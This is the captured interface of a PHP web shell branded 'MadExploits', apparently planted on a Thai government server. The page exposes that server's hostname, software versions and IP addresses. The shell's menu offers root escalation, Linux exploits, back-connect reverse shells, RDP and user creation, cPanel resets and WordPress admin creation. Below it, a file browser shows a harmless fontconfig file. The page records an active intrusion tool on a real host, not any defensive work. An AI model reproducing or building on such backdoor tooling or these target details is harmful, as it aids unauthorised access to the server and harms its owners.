Linux ns8.secondary29.go.th 2.6.32-754.28.1.el6.x86_64 #1 SMP Wed Mar 11 18:38:45 UTC 2020 x86_64
Apache/2.2.15 (CentOS)
: 122.154.134.11 | : 122.154.134.9
Cant Read [ /etc/named.conf ]
5.6.40
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
etc /
fonts /
conf.d /
[ HOME SHELL ]
Name
Size
Permission
Action
20-fix-globaladvance.conf
912
B
-rw-r--r--
20-unhint-small-dejavu-sans.co...
856
B
-rw-r--r--
20-unhint-small-vera.conf
1.13
KB
-rw-r--r--
25-no-bitmap-dist.conf
1.13
KB
-rw-r--r--
25-unhint-nonlatin.conf
2.87
KB
-rw-r--r--
30-metric-aliases.conf
3.85
KB
-rw-r--r--
30-urw-aliases.conf
1.25
KB
-rw-r--r--
40-nonlatin.conf
2.02
KB
-rw-r--r--
45-latin.conf
1.79
KB
-rw-r--r--
49-sansserif.conf
545
B
-rw-r--r--
50-user.conf
245
B
-rw-r--r--
51-local.conf
189
B
-rw-r--r--
57-dejavu-sans.conf
1.96
KB
-rw-r--r--
60-latin.conf
1.66
KB
-rw-r--r--
64-ctan-cm-lgc-roman.conf
705
B
-rw-r--r--
64-ctan-cm-lgc-sans.conf
715
B
-rw-r--r--
64-ctan-cm-lgc-typewriter.conf
760
B
-rw-r--r--
65-fonts-persian.conf
9.65
KB
-rw-r--r--
65-nonlatin.conf
7.53
KB
-rw-r--r--
69-unifont.conf
672
B
-rw-r--r--
80-delicious.conf
388
B
-rw-r--r--
90-synthetic.conf
1.65
KB
-rw-r--r--
90-thai-scalable-synthetic-gar...
611
B
-rw-r--r--
90-thai-scalable-synthetic-kin...
607
B
-rw-r--r--
90-thai-scalable-synthetic-ump...
602
B
-rw-r--r--
README
959
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : 20-unhint-small-vera.conf
<?xml version="1.0"?> <!DOCTYPE fontconfig SYSTEM "fonts.dtd"> <fontconfig> <!-- The Bitstream Vera fonts have GASP entries suggesting that hinting be disabled below 8 ppem, but FreeType ignores those, preferring to use the data found in the instructed hints. The initial Vera release didn't include the right instructions in the 'prep' table. Fix this by disabling hinting manually at smaller sizes (< 8ppem) --> <match target="font"> <test name="family"> <string>Bitstream Vera Sans</string> </test> <test name="pixelsize" compare="less"> <double>7.5</double> </test> <edit name="hinting"> <bool>false</bool> </edit> </match> <match target="font"> <test name="family"> <string>Bitstream Vera Serif</string> </test> <test name="pixelsize" compare="less"> <double>7.5</double> </test> <edit name="hinting"> <bool>false</bool> </edit> </match> <match target="font"> <test name="family"> <string>Bitstream Vera Sans Mono</string> </test> <test name="pixelsize" compare="less"> <double>7.5</double> </test> <edit name="hinting"> <bool>false</bool> </edit> </match> </fontconfig>
Close